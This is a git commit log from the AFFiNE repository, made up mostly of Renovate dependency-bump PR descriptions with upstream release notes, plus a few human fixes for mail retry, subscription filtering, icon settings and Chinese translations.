##### 🚀 Features

-
[`b84941e`](https://redirect.github.com/oxc-project/oxc/commit/b84941e)
linter/vue: Implement no-expose-after-await rule
([#&#8203;22675](https://redirect.github.com/oxc-project/oxc/issues/22675))
(bab)
-
[`98b98c1`](https://redirect.github.com/oxc-project/oxc/commit/98b98c1)
linter/vue: Implement no-computed-properties-in-data rule
([#&#8203;22674](https://redirect.github.com/oxc-project/oxc/issues/22674))
(bab)
-
[`2d4c919`](https://redirect.github.com/oxc-project/oxc/commit/2d4c919)
oxlint: Support `vite-plus/resolveConfig` for vite.config.ts
([#&#8203;22456](https://redirect.github.com/oxc-project/oxc/issues/22456))
(leaysgur)
-
[`2a60012`](https://redirect.github.com/oxc-project/oxc/commit/2a60012)
linter/vue: Implement require-render-return rule
([#&#8203;22613](https://redirect.github.com/oxc-project/oxc/issues/22613))
(bab)
-
[`9f227fd`](https://redirect.github.com/oxc-project/oxc/commit/9f227fd)
linter/vue: Implement no-deprecated-props-default-this rule
([#&#8203;21892](https://redirect.github.com/oxc-project/oxc/issues/21892))
(bab)
-
[`87f065e`](https://redirect.github.com/oxc-project/oxc/commit/87f065e)
linter/vue: Implement return-in-emits-validator rule
([#&#8203;21935](https://redirect.github.com/oxc-project/oxc/issues/21935))
(bab)
-
[`ea0380c`](https://redirect.github.com/oxc-project/oxc/commit/ea0380c)
linter/unicorn: Implement `import-style` rule
([#&#8203;22173](https://redirect.github.com/oxc-project/oxc/issues/22173))
(Hao Chen)
-
[`dde40fe`](https://redirect.github.com/oxc-project/oxc/commit/dde40fe)
linter/vue: Implement no-watch-after-await rule
([#&#8203;22006](https://redirect.github.com/oxc-project/oxc/issues/22006))
(bab)
-
[`a735eb0`](https://redirect.github.com/oxc-project/oxc/commit/a735eb0)
linter/vue: Implement valid-next-tick rule
([#&#8203;22531](https://redirect.github.com/oxc-project/oxc/issues/22531))
(bab)
-
[`6dc615d`](https://redirect.github.com/oxc-project/oxc/commit/6dc615d)
linter/vue: Implement no-shared-component-data rule
([#&#8203;21842](https://redirect.github.com/oxc-project/oxc/issues/21842))
(bab)
-
[`a656418`](https://redirect.github.com/oxc-project/oxc/commit/a656418)
linter/vue: Implement valid-define-options rule
([#&#8203;22107](https://redirect.github.com/oxc-project/oxc/issues/22107))
(bab)
-
[`bb6f1b2`](https://redirect.github.com/oxc-project/oxc/commit/bb6f1b2)
linter/vue: Implement require-slots-as-functions rule
([#&#8203;22244](https://redirect.github.com/oxc-project/oxc/issues/22244))
(bab)
-
[`5fa4774`](https://redirect.github.com/oxc-project/oxc/commit/5fa4774)
linter/n: Implement `callback-return` rule
([#&#8203;22470](https://redirect.github.com/oxc-project/oxc/issues/22470))
(Mikhail Baev)

</details>

---

### Configuration

📅 **Schedule**: (UTC)

- Branch creation
  - At any time (no schedule defined)
- Automerge
  - At any time (no schedule defined)

🚦 **Automerge**: Disabled by config. Please merge this manually once you
are satisfied.

♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the
rebase/retry checkbox.

🔕 **Ignore**: Close this PR and you won't be reminded about this update
again.

---

- [ ] <!-- rebase-check -->If you want to rebase/retry this PR, check
this box

---

This PR was generated by [Mend Renovate](https://mend.io/renovate/).
View the [repository job
log](https://developer.mend.io/github/toeverything/AFFiNE).

<!--renovate-debug:eyJjcmVhdGVkSW5WZXIiOiI0My4yMDIuMSIsInVwZGF0ZWRJblZlciI6IjQzLjIwMi4xIiwidGFyZ2V0QnJhbmNoIjoiY2FuYXJ5IiwibGFiZWxzIjpbImRlcGVuZGVuY2llcyJdfQ==-->

Co-authored-by: renovate[bot] <29139614+renovate[bot]@users.noreply.github.com>
2026-05-31 04:07:20 +08:00
steffenrapp 7a575a4a5b fix: hide experimental settings for doc and folder icons (#15021)
should fix #13955
The emoji doc and folder icons have been officially released with v0.25
but the experimental settings were still available with no effect if
switched.

<!-- This is an auto-generated comment: release notes by coderabbit.ai
-->

## Summary by CodeRabbit

* **Chores**
* Feature flags for emoji folder and document icons are no longer
user-configurable.

<!-- review_stack_entry_start -->

[![Review Change
Stack](https://storage.googleapis.com/coderabbit_public_assets/review-stack-in-coderabbit-ui.svg)](https://app.coderabbit.ai/change-stack/toeverything/AFFiNE/pull/15021?utm_source=github_walkthrough&utm_medium=github&utm_campaign=change_stack)

<!-- review_stack_entry_end -->

<!-- end of auto-generated comment: release notes by coderabbit.ai -->
2026-05-31 04:06:49 +08:00
renovate[bot] f5fc7c8c00 chore: bump up eslint-plugin-oxlint version to v1.67.0 (#15036)
This PR contains the following updates:

| Package | Change |
[Age](https://docs.renovatebot.com/merge-confidence/) |
[Confidence](https://docs.renovatebot.com/merge-confidence/) |
|---|---|---|---|
|
[eslint-plugin-oxlint](https://redirect.github.com/oxc-project/eslint-plugin-oxlint)
| [`1.66.0` →
`1.67.0`](https://renovatebot.com/diffs/npm/eslint-plugin-oxlint/1.66.0/1.67.0)
|
![age](https://developer.mend.io/api/mc/badges/age/npm/eslint-plugin-oxlint/1.67.0?slim=true)
|
![confidence](https://developer.mend.io/api/mc/badges/confidence/npm/eslint-plugin-oxlint/1.66.0/1.67.0?slim=true)
|

---

### Release Notes

<details>
<summary>oxc-project/eslint-plugin-oxlint
(eslint-plugin-oxlint)</summary>

###
[`v1.67.0`](https://redirect.github.com/oxc-project/eslint-plugin-oxlint/releases/tag/v1.67.0)

[Compare
Source](https://redirect.github.com/oxc-project/eslint-plugin-oxlint/compare/v1.66.0...v1.67.0)

*No significant changes*

#####     [View changes on
GitHub](https://redirect.github.com/oxc-project/eslint-plugin-oxlint/compare/v1.66.0...v1.67.0)

</details>

---

### Configuration

📅 **Schedule**: (UTC)

- Branch creation
  - At any time (no schedule defined)
- Automerge
  - At any time (no schedule defined)

🚦 **Automerge**: Disabled by config. Please merge this manually once you
are satisfied.

♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the
rebase/retry checkbox.

🔕 **Ignore**: Close this PR and you won't be reminded about this update
again.

---

- [ ] <!-- rebase-check -->If you want to rebase/retry this PR, check
this box

---

This PR was generated by [Mend Renovate](https://mend.io/renovate/).
View the [repository job
log](https://developer.mend.io/github/toeverything/AFFiNE).

<!--renovate-debug:eyJjcmVhdGVkSW5WZXIiOiI0My4xOTQuMCIsInVwZGF0ZWRJblZlciI6IjQzLjE5NC4wIiwidGFyZ2V0QnJhbmNoIjoiY2FuYXJ5IiwibGFiZWxzIjpbImRlcGVuZGVuY2llcyJdfQ==-->

Co-authored-by: renovate[bot] <29139614+renovate[bot]@users.noreply.github.com>
2026-05-31 00:07:16 +08:00
renovate[bot] 7d3e38d652 chore: bump up nestjs (#15035)
This PR contains the following updates:

| Package | Change |
[Age](https://docs.renovatebot.com/merge-confidence/) |
[Confidence](https://docs.renovatebot.com/merge-confidence/) |
|---|---|---|---|
| [@nestjs-cls/transactional](https://papooch.github.io/nestjs-cls/)
([source](https://redirect.github.com/Papooch/nestjs-cls)) | [`3.2.0` →
`3.2.1`](https://renovatebot.com/diffs/npm/@nestjs-cls%2ftransactional/3.2.0/3.2.1)
|
![age](https://developer.mend.io/api/mc/badges/age/npm/@nestjs-cls%2ftransactional/3.2.1?slim=true)
|
![confidence](https://developer.mend.io/api/mc/badges/confidence/npm/@nestjs-cls%2ftransactional/3.2.0/3.2.1?slim=true)
|
|
[@nestjs-cls/transactional-adapter-prisma](https://papooch.github.io/nestjs-cls/)
([source](https://redirect.github.com/Papooch/nestjs-cls)) | [`1.3.4` →
`1.3.5`](https://renovatebot.com/diffs/npm/@nestjs-cls%2ftransactional-adapter-prisma/1.3.4/1.3.5)
|
![age](https://developer.mend.io/api/mc/badges/age/npm/@nestjs-cls%2ftransactional-adapter-prisma/1.3.5?slim=true)
|
![confidence](https://developer.mend.io/api/mc/badges/confidence/npm/@nestjs-cls%2ftransactional-adapter-prisma/1.3.4/1.3.5?slim=true)
|
| [@nestjs/common](https://nestjs.com)
([source](https://redirect.github.com/nestjs/nest/tree/HEAD/packages/common))
| [`11.1.23` →
`11.1.24`](https://renovatebot.com/diffs/npm/@nestjs%2fcommon/11.1.23/11.1.24)
|
![age](https://developer.mend.io/api/mc/badges/age/npm/@nestjs%2fcommon/11.1.24?slim=true)
|
![confidence](https://developer.mend.io/api/mc/badges/confidence/npm/@nestjs%2fcommon/11.1.23/11.1.24?slim=true)
|
| [@nestjs/core](https://nestjs.com)
([source](https://redirect.github.com/nestjs/nest/tree/HEAD/packages/core))
| [`11.1.23` →
`11.1.24`](https://renovatebot.com/diffs/npm/@nestjs%2fcore/11.1.23/11.1.24)
|
![age](https://developer.mend.io/api/mc/badges/age/npm/@nestjs%2fcore/11.1.24?slim=true)
|
![confidence](https://developer.mend.io/api/mc/badges/confidence/npm/@nestjs%2fcore/11.1.23/11.1.24?slim=true)
|
| [@nestjs/platform-express](https://nestjs.com)
([source](https://redirect.github.com/nestjs/nest/tree/HEAD/packages/platform-express))
| [`11.1.23` →
`11.1.24`](https://renovatebot.com/diffs/npm/@nestjs%2fplatform-express/11.1.23/11.1.24)
|
![age](https://developer.mend.io/api/mc/badges/age/npm/@nestjs%2fplatform-express/11.1.24?slim=true)
|
![confidence](https://developer.mend.io/api/mc/badges/confidence/npm/@nestjs%2fplatform-express/11.1.23/11.1.24?slim=true)
|
| [@nestjs/platform-socket.io](https://nestjs.com)
([source](https://redirect.github.com/nestjs/nest/tree/HEAD/packages/platform-socket.io))
| [`11.1.23` →
`11.1.24`](https://renovatebot.com/diffs/npm/@nestjs%2fplatform-socket.io/11.1.23/11.1.24)
|
![age](https://developer.mend.io/api/mc/badges/age/npm/@nestjs%2fplatform-socket.io/11.1.24?slim=true)
|
![confidence](https://developer.mend.io/api/mc/badges/confidence/npm/@nestjs%2fplatform-socket.io/11.1.23/11.1.24?slim=true)
|
| [@nestjs/websockets](https://redirect.github.com/nestjs/nest)
([source](https://redirect.github.com/nestjs/nest/tree/HEAD/packages/websockets))
| [`11.1.23` →
`11.1.24`](https://renovatebot.com/diffs/npm/@nestjs%2fwebsockets/11.1.23/11.1.24)
|
![age](https://developer.mend.io/api/mc/badges/age/npm/@nestjs%2fwebsockets/11.1.24?slim=true)
|
![confidence](https://developer.mend.io/api/mc/badges/confidence/npm/@nestjs%2fwebsockets/11.1.23/11.1.24?slim=true)
|

---

### Release Notes

<details>
<summary>Papooch/nestjs-cls (@&#8203;nestjs-cls/transactional)</summary>

###
[`v3.2.1`](https://redirect.github.com/Papooch/nestjs-cls/releases/tag/v3.2.1)

[Compare
Source](https://redirect.github.com/Papooch/nestjs-cls/compare/@nestjs-cls/transactional@3.2.0...@nestjs-cls/transactional@3.2.1)

- fix: `has` method respects falsy values
([#&#8203;57](https://redirect.github.com/Papooch/nestjs-cls/issues/57))
[`69f06e7`](https://redirect.github.com/Papooch/nestjs-cls/commit/69f06e7)

</details>

<details>
<summary>nestjs/nest (@&#8203;nestjs/common)</summary>

###
[`v11.1.24`](https://redirect.github.com/nestjs/nest/compare/v11.1.23...v11.1.24)

[Compare
Source](https://redirect.github.com/nestjs/nest/compare/v11.1.23...v11.1.24)

</details>

<details>
<summary>nestjs/nest (@&#8203;nestjs/core)</summary>

###
[`v11.1.24`](https://redirect.github.com/nestjs/nest/compare/v11.1.23...v11.1.24)

[Compare
Source](https://redirect.github.com/nestjs/nest/compare/v11.1.23...v11.1.24)

</details>

<details>
<summary>nestjs/nest (@&#8203;nestjs/platform-express)</summary>

###
[`v11.1.24`](https://redirect.github.com/nestjs/nest/compare/v11.1.23...v11.1.24)

[Compare
Source](https://redirect.github.com/nestjs/nest/compare/v11.1.23...v11.1.24)

</details>

<details>
<summary>nestjs/nest (@&#8203;nestjs/platform-socket.io)</summary>

###
[`v11.1.24`](https://redirect.github.com/nestjs/nest/releases/tag/v11.1.24)

[Compare
Source](https://redirect.github.com/nestjs/nest/compare/v11.1.23...v11.1.24)

##### v11.1.24 (2026-05-25)

##### Bug fixes

- `core`
- [#&#8203;17009](https://redirect.github.com/nestjs/nest/pull/17009)
fix(core): reset dependency-tree cache on metadata changes
([@&#8203;puneetdixit200](https://redirect.github.com/puneetdixit200))

##### Enhancements

- `core`
- [#&#8203;16997](https://redirect.github.com/nestjs/nest/pull/16997)
feat(core): warn on late websocket adapter registration
([@&#8203;hbinhng](https://redirect.github.com/hbinhng))

##### Dependencies

- `platform-ws`
- [#&#8203;17011](https://redirect.github.com/nestjs/nest/pull/17011)
chore(deps): bump ws from 8.20.1 to 8.21.0
([@&#8203;dependabot\[bot\]](https://redirect.github.com/apps/dependabot))

##### Committers: 2

- Nguyễn Hải Bình
([@&#8203;hbinhng](https://redirect.github.com/hbinhng))
- Puneet Dixit
([@&#8203;puneetdixit200](https://redirect.github.com/puneetdixit200))

</details>

---

### Configuration

📅 **Schedule**: (UTC)

- Branch creation
  - At any time (no schedule defined)
- Automerge
  - At any time (no schedule defined)

🚦 **Automerge**: Disabled by config. Please merge this manually once you
are satisfied.

♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the
rebase/retry checkbox.

👻 **Immortal**: This PR will be recreated if closed unmerged. Get
[config
help](https://redirect.github.com/renovatebot/renovate/discussions) if
that's undesired.

---

- [ ] <!-- rebase-check -->If you want to rebase/retry this PR, check
this box

---

This PR was generated by [Mend Renovate](https://mend.io/renovate/).
View the [repository job
log](https://developer.mend.io/github/toeverything/AFFiNE).

<!--renovate-debug:eyJjcmVhdGVkSW5WZXIiOiI0My4xOTQuMCIsInVwZGF0ZWRJblZlciI6IjQzLjE5NC4wIiwidGFyZ2V0QnJhbmNoIjoiY2FuYXJ5IiwibGFiZWxzIjpbImRlcGVuZGVuY2llcyJdfQ==-->

Co-authored-by: renovate[bot] <29139614+renovate[bot]@users.noreply.github.com>
2026-05-31 00:06:59 +08:00
DarkSky b05c387f96 fix(server): mail test & retry (#15044)
#### PR Dependency Tree


* **PR #15044** 👈

This tree was auto-generated by
[Charcoal](https://github.com/danerwilliams/charcoal)

<!-- This is an auto-generated comment: release notes by coderabbit.ai
-->
## Summary by CodeRabbit

* **Bug Fixes**
* Stop sending notifications to disabled users; skip member invites when
workspace names contain URLs/domains
* Improve mail retry handling (per-recipient exhaustion, expiry, and
cache cleanup)
  * Make many email headers/lead lines more generic and consistent
  * Fail-safe workspace content parsing to avoid crashes

* **New Features**
* 24-hour signup protection for sharing, invites, and invite-link
creation
  * Job-queue: remove jobs by payload predicate

* **Tests**
* Expanded tests for mail jobs, SMTP hostname handling, payment
checkout, job-queue removal, and abuse-detection utilities
  * Updated test fixtures to set createdAt timestamps for new users

* **Chores**
  * Added required name input for test-email mutation
  * Database flush retry with deadlock detection/backoff

<!-- review_stack_entry_start -->

[![Review Change
Stack](https://storage.googleapis.com/coderabbit_public_assets/review-stack-in-coderabbit-ui.svg)](https://app.coderabbit.ai/change-stack/toeverything/AFFiNE/pull/15044?utm_source=github_walkthrough&utm_medium=github&utm_campaign=change_stack)

<!-- review_stack_entry_end -->
<!-- end of auto-generated comment: release notes by coderabbit.ai -->
2026-05-31 00:06:29 +08:00
renovate[bot] 2bd920fea6 chore: bump up @inquirer/prompts version to v8 (#15025)
This PR contains the following updates:

| Package | Change |
[Age](https://docs.renovatebot.com/merge-confidence/) |
[Confidence](https://docs.renovatebot.com/merge-confidence/) |
|---|---|---|---|
|
[@inquirer/prompts](https://redirect.github.com/SBoudrias/Inquirer.js/blob/main/packages/prompts/README.md)
([source](https://redirect.github.com/SBoudrias/Inquirer.js)) |
[`^7.10.1` →
`^8.0.0`](https://renovatebot.com/diffs/npm/@inquirer%2fprompts/7.10.1/8.5.0)
|
![age](https://developer.mend.io/api/mc/badges/age/npm/@inquirer%2fprompts/8.5.0?slim=true)
|
![confidence](https://developer.mend.io/api/mc/badges/confidence/npm/@inquirer%2fprompts/7.10.1/8.5.0?slim=true)
|

---

### Release Notes

<details>
<summary>SBoudrias/Inquirer.js (@&#8203;inquirer/prompts)</summary>

###
[`v8.5.0`](https://redirect.github.com/SBoudrias/Inquirer.js/compare/@inquirer/prompts@8.4.3...5ca6d1101d5d3f8fb066cd5b389bccfdafbbe0c0)

[Compare
Source](https://redirect.github.com/SBoudrias/Inquirer.js/compare/@inquirer/prompts@8.4.3...@inquirer/prompts@8.5.0)

###
[`v8.4.3`](https://redirect.github.com/SBoudrias/Inquirer.js/releases/tag/%40inquirer/prompts%408.4.3)

[Compare
Source](https://redirect.github.com/SBoudrias/Inquirer.js/compare/@inquirer/prompts@8.4.2...@inquirer/prompts@8.4.3)

- Fix: Windows rendering bug
- Fix: Preserve exact literal types in `choices` array (Typescript only)
- Fix: Allow input `default` value to be of type `undefined` (Typescript
only)
- Bump dependencies

###
[`v8.4.2`](https://redirect.github.com/SBoudrias/Inquirer.js/releases/tag/%40inquirer/prompts%408.4.2)

[Compare
Source](https://redirect.github.com/SBoudrias/Inquirer.js/compare/@inquirer/prompts@8.4.1...@inquirer/prompts@8.4.2)

- Fix: some Windows terminals would freeze and not react to keypresses.

###
[`v8.4.1`](https://redirect.github.com/SBoudrias/Inquirer.js/releases/tag/%40inquirer/prompts%408.4.1)

[Compare
Source](https://redirect.github.com/SBoudrias/Inquirer.js/compare/@inquirer/prompts@8.4.0...@inquirer/prompts@8.4.1)

- Improve `expand` prompt type inferrence.

###
[`v8.4.0`](https://redirect.github.com/SBoudrias/Inquirer.js/releases/tag/%40inquirer/prompts%408.4.0)

[Compare
Source](https://redirect.github.com/SBoudrias/Inquirer.js/compare/@inquirer/prompts@8.3.2...@inquirer/prompts@8.4.0)

- Feat: Added a loading message while validating editor prompt input.
- Type improvement: Better type inference with checkbox, search and
expand prompts.
- Fix: `editor` prompt not always properly handling editor path on
windows.

###
[`v8.3.2`](https://redirect.github.com/SBoudrias/Inquirer.js/releases/tag/%40inquirer/prompts%408.3.2)

[Compare
Source](https://redirect.github.com/SBoudrias/Inquirer.js/compare/@inquirer/prompts@8.3.1...@inquirer/prompts@8.3.2)

- Fix broken 8.3.1 release process.

###
[`v8.3.1`](https://redirect.github.com/SBoudrias/Inquirer.js/releases/tag/%40inquirer/prompts%408.3.1)

[Compare
Source](https://redirect.github.com/SBoudrias/Inquirer.js/compare/@inquirer/prompts@8.3.0...@inquirer/prompts@8.3.1)

- Bump dependencies

###
[`v8.3.0`](https://redirect.github.com/SBoudrias/Inquirer.js/releases/tag/%40inquirer/prompts%408.3.0)

[Compare
Source](https://redirect.github.com/SBoudrias/Inquirer.js/compare/@inquirer/prompts@8.2.1...@inquirer/prompts@8.3.0)

- Fix: Keypresses happening before a prompt is rendered are now ignored.
- Fix (checkbox): Element who're both checked and disabled are now
always included in the returned array.
- Feat (select/checkbox): Cursor will now hover disabled options of the
list; but they still cannot be interacted with. This prevents the cursor
jumping ahead in ways that can be confusing.
- Feat: various new theme options to make all prompts content
localizable.

Finally, see our new [`@inquirer/i18n`
package](https://redirect.github.com/SBoudrias/Inquirer.js/tree/main/packages/i18n)!

###
[`v8.2.1`](https://redirect.github.com/SBoudrias/Inquirer.js/releases/tag/%40inquirer/prompts%408.2.1)

[Compare
Source](https://redirect.github.com/SBoudrias/Inquirer.js/compare/@inquirer/prompts@8.2.0...@inquirer/prompts@8.2.1)

- chore: Switch `wrap-ansi` with `fast-wrap-ansi`

###
[`v8.2.0`](https://redirect.github.com/SBoudrias/Inquirer.js/releases/tag/%40inquirer/prompts%408.2.0)

[Compare
Source](https://redirect.github.com/SBoudrias/Inquirer.js/compare/@inquirer/prompts@8.1.0...@inquirer/prompts@8.2.0)

- feat(`search`): Add support for `default`.
- feat(`rawlist`): Add support for `description` of choices. That
information is displayed under the list when the choice is highlighted.
- Bump dependencies

###
[`v8.1.0`](https://redirect.github.com/SBoudrias/Inquirer.js/releases/tag/%40inquirer/prompts%408.1.0)

[Compare
Source](https://redirect.github.com/SBoudrias/Inquirer.js/compare/@inquirer/prompts@8.0.2...@inquirer/prompts@8.1.0)

- Feat: `rawlist` now supports `default` option.
- Fix: `select` now infer return type properly when passing a `choices`
array of string literals.

###
[`v8.0.2`](https://redirect.github.com/SBoudrias/Inquirer.js/releases/tag/%40inquirer/prompts%408.0.2)

[Compare
Source](https://redirect.github.com/SBoudrias/Inquirer.js/compare/@inquirer/prompts@8.0.1...@inquirer/prompts@8.0.2)

- Fix Typescript not discovering types when `moduleResolution` is set to
`commonjs` (you probably want to fix that in your project if it's still
in your tsconfig)

###
[`v8.0.1`](https://redirect.github.com/SBoudrias/Inquirer.js/compare/@inquirer/prompts@8.0.0...@inquirer/prompts@8.0.1)

[Compare
Source](https://redirect.github.com/SBoudrias/Inquirer.js/compare/@inquirer/prompts@8.0.0...@inquirer/prompts@8.0.1)

###
[`v8.0.0`](https://redirect.github.com/SBoudrias/Inquirer.js/releases/tag/%40inquirer/prompts%408.0.0)

[Compare
Source](https://redirect.github.com/SBoudrias/Inquirer.js/compare/@inquirer/prompts@7.10.1...@inquirer/prompts@8.0.0)

### Release Notes

#### 🚨 Breaking Changes

This is a major release that modernizes the codebase for Node.js ≥ 20.

##### ESM Only - No More CommonJS Support

**Impact:** All packages are now ESM-only. CommonJS imports are no
longer supported.

If you're on modern Node versions (≥ 20), this should be transparent and
have no impact.

##### Node.js Version Requirement

**Minimum Node.js version is now 20.x**

Node.js versions below 20 are no longer supported. Please upgrade to
Node.js 20 or later.

Node min versions: `>=23.5.0 || ^22.13.0 || ^21.7.0 || ^20.12.0`

##### Deprecated APIs Removed

The following deprecated APIs have been removed after being deprecated
in previous releases:

##### `list` prompt alias removed (affects `inquirer` package only)

The `list` alias has been removed from the `inquirer` package. This only
impacts users of the legacy `inquirer` package, not users of
`@inquirer/prompts` or individual prompt packages.

```js
//  No longer available (inquirer package only)
import inquirer from 'inquirer';
const answer = await inquirer.prompt([
  { type: 'list', name: 'choice', message: 'Pick one:', choices: ['a', 'b'] }
]);

//  Use 'select' instead
import inquirer from 'inquirer';
const answer = await inquirer.prompt([
  { type: 'select', name: 'choice', message: 'Pick one:', choices: ['a', 'b'] }
]);
```

##### `helpMode` theme property removed

```js
//  No longer available
const answer = await select({
  theme: { helpMode: 'never' }
});

//  Use theme.style.keysHelpTip instead
const answer = await select({
  theme: {
    style: {
      keysHelpTip: () => undefined // or your custom styling function
    }
  }
});
```

This affects the following prompts:

- `@inquirer/checkbox`
- `@inquirer/search`
- `@inquirer/select`

##### `instructions` config property removed

```js
//  No longer available
const answer = await checkbox({
  instructions: 'Custom instructions'
});

//  Use theme.style.keysHelpTip instead
const answer = await checkbox({
  theme: {
    style: {
      keysHelpTip: (text) => 'Custom instructions'
    }
  }
});
```

This affects the following prompts:

- `@inquirer/checkbox`
- `@inquirer/search`
- `@inquirer/select`

##### `cancel()` method removed

The `cancel()` method on prompt return custom `Promise` has been
removed.

```js
//  No longer available
const answerPromise = input({ message: 'Name?' });
answerPromise.cancel();
const answer = await answerPromise;

//  Use AbortSignal instead
const controller = new AbortController();
const answer = await input(
  { message: 'Name?' },
  { signal: controller.signal }
);
controller.abort();
```

##### Color Library Change: yoctocolors → Node.js `styleText`

**Internal change:** The project now uses Node.js built-in
`util.styleText()` instead of the `yoctocolors` package for terminal
colors. This makes Inquirer smaller and reduces risks of vulnerabilities
coming from transitive dependencies.

</details>

---

### Configuration

📅 **Schedule**: (UTC)

- Branch creation
  - At any time (no schedule defined)
- Automerge
  - At any time (no schedule defined)

🚦 **Automerge**: Disabled by config. Please merge this manually once you
are satisfied.

♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the
rebase/retry checkbox.

🔕 **Ignore**: Close this PR and you won't be reminded about this update
again.

---

- [ ] <!-- rebase-check -->If you want to rebase/retry this PR, check
this box

---

This PR was generated by [Mend Renovate](https://mend.io/renovate/).
View the [repository job
log](https://developer.mend.io/github/toeverything/AFFiNE).

<!--renovate-debug:eyJjcmVhdGVkSW5WZXIiOiI0My4xOTQuMCIsInVwZGF0ZWRJblZlciI6IjQzLjE5NC4wIiwidGFyZ2V0QnJhbmNoIjoiY2FuYXJ5IiwibGFiZWxzIjpbImRlcGVuZGVuY2llcyJdfQ==-->

Co-authored-by: renovate[bot] <29139614+renovate[bot]@users.noreply.github.com>
2026-05-28 15:21:54 +08:00
renovate[bot] b3b9c54a89 chore: bump up @types/nodemailer version to v8 (#15026)
This PR contains the following updates:

| Package | Change |
[Age](https://docs.renovatebot.com/merge-confidence/) |
[Confidence](https://docs.renovatebot.com/merge-confidence/) |
|---|---|---|---|
|
[@types/nodemailer](https://redirect.github.com/DefinitelyTyped/DefinitelyTyped/tree/master/types/nodemailer)
([source](https://redirect.github.com/DefinitelyTyped/DefinitelyTyped/tree/HEAD/types/nodemailer))
| [`^7.0.0` →
`^8.0.0`](https://renovatebot.com/diffs/npm/@types%2fnodemailer/7.0.9/8.0.0)
|
![age](https://developer.mend.io/api/mc/badges/age/npm/@types%2fnodemailer/8.0.0?slim=true)
|
![confidence](https://developer.mend.io/api/mc/badges/confidence/npm/@types%2fnodemailer/7.0.9/8.0.0?slim=true)
|

---

### Configuration

📅 **Schedule**: (UTC)

- Branch creation
  - At any time (no schedule defined)
- Automerge
  - At any time (no schedule defined)

🚦 **Automerge**: Disabled by config. Please merge this manually once you
are satisfied.

♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the
rebase/retry checkbox.

🔕 **Ignore**: Close this PR and you won't be reminded about this update
again.

---

- [ ] <!-- rebase-check -->If you want to rebase/retry this PR, check
this box

---

This PR was generated by [Mend Renovate](https://mend.io/renovate/).
View the [repository job
log](https://developer.mend.io/github/toeverything/AFFiNE).

<!--renovate-debug:eyJjcmVhdGVkSW5WZXIiOiI0My4xOTQuMCIsInVwZGF0ZWRJblZlciI6IjQzLjE5NC4wIiwidGFyZ2V0QnJhbmNoIjoiY2FuYXJ5IiwibGFiZWxzIjpbImRlcGVuZGVuY2llcyJdfQ==-->

Co-authored-by: renovate[bot] <29139614+renovate[bot]@users.noreply.github.com>
2026-05-28 15:21:06 +08:00
DarkSky 1d08e1d8c0 fix(server): dirty data handle (#15034)
#### PR Dependency Tree


* **PR #15034** 👈

This tree was auto-generated by
[Charcoal](https://github.com/danerwilliams/charcoal)

<!-- This is an auto-generated comment: release notes by coderabbit.ai
-->
## Summary by CodeRabbit

* **Refactor**
* Consolidated subscription visibility and “active” selection logic so
all subscription queries use a shared, consistent filter across the
platform.

* **Tests**
* Added a test to ensure expired subscriptions are excluded from active
subscription results.
* Updated test fixtures to differentiate expired, unexpired, and onetime
subscriptions for more accurate coverage.

<!-- review_stack_entry_start -->

[![Review Change
Stack](https://storage.googleapis.com/coderabbit_public_assets/review-stack-in-coderabbit-ui.svg)](https://app.coderabbit.ai/change-stack/toeverything/AFFiNE/pull/15034?utm_source=github_walkthrough&utm_medium=github&utm_campaign=change_stack)

<!-- review_stack_entry_end -->
<!-- end of auto-generated comment: release notes by coderabbit.ai -->
2026-05-28 15:20:17 +08:00
xuzhi 66a6a5fffc feat(i18n): add missing zh-Hans translations (#15032)
## Summary

This PR completes the missing Simplified Chinese (`zh-Hans`) i18n
resource coverage.

The current i18n completeness calculation is based on key coverage
between `en.json` and each locale resource file. Before this change,
`zh-Hans.json` contained 2331 keys while `en.json` contained 2406 keys,
resulting in a displayed completeness of 97%.

This change adds the 75 missing `zh-Hans` translation entries and
updates the generated completeness value for `zh-Hans` from 97% to 100%.

## Changes

- Added 75 missing Simplified Chinese translations to
`packages/frontend/i18n/src/resources/zh-Hans.json`.
- Updated `packages/frontend/i18n/src/i18n-completenesses.json` so
`zh-Hans` now reports 100% completeness.
- Kept the scope limited to missing i18n resource keys only.

## Notes

This PR does not modify existing `zh-Hans` translations, terminology
choices, or hardcoded English UI strings outside the i18n resource
files.

## Verification

- Confirmed `zh-Hans.json` parses successfully.
- Confirmed `zh-Hans.json` now has full key coverage against `en.json`.
- Confirmed missing key count is 0.
- Confirmed computed `zh-Hans` completeness is 100%.
- Ran pre-commit checks:
  - `yarn lint-staged`
  - `yarn lint:ox`

<!-- This is an auto-generated comment: release notes by coderabbit.ai
-->

## Summary by CodeRabbit

* **Chores**
* Completed Chinese (Simplified) translations with 100% coverage for the
application.
* Added new translations across multiple areas: appearance and image
settings, export functionality, document import from Bear and Obsidian,
analytics and viewer information, editor settings including auto-date
titles and icon options, workspace sharing controls, calendar
integration with CalDAV support, share menu tooltips, and comprehensive
error messages.

<!-- review_stack_entry_start -->

[![Review Change
Stack](https://storage.googleapis.com/coderabbit_public_assets/review-stack-in-coderabbit-ui.svg)](https://app.coderabbit.ai/change-stack/toeverything/AFFiNE/pull/15032?utm_source=github_walkthrough&utm_medium=github&utm_campaign=change_stack)

<!-- review_stack_entry_end -->

<!-- end of auto-generated comment: release notes by coderabbit.ai -->
2026-05-28 05:15:13 +08:00
renovate[bot] 4f14e8840c chore: bump up RevenueCat/purchases-ios-spm version to from: "5.74.0" (#15024)
This PR contains the following updates:

| Package | Update | Change |
|---|---|---|
|
[RevenueCat/purchases-ios-spm](https://redirect.github.com/RevenueCat/purchases-ios-spm)
| minor | `from: "5.73.0"` → `from: "5.74.0"` |

---

### Release Notes

<details>
<summary>RevenueCat/purchases-ios-spm
(RevenueCat/purchases-ios-spm)</summary>

###
[`v5.74.0`](https://redirect.github.com/RevenueCat/purchases-ios-spm/compare/5.73.1...5.74.0)

[Compare
Source](https://redirect.github.com/RevenueCat/purchases-ios-spm/compare/5.73.1...5.74.0)

###
[`v5.73.1`](https://redirect.github.com/RevenueCat/purchases-ios-spm/blob/HEAD/CHANGELOG.md#5731)

[Compare
Source](https://redirect.github.com/RevenueCat/purchases-ios-spm/compare/5.73.0...5.73.1)

#### 5.73.1

</details>

---

### Configuration

📅 **Schedule**: (UTC)

- Branch creation
  - At any time (no schedule defined)
- Automerge
  - At any time (no schedule defined)

🚦 **Automerge**: Disabled by config. Please merge this manually once you
are satisfied.

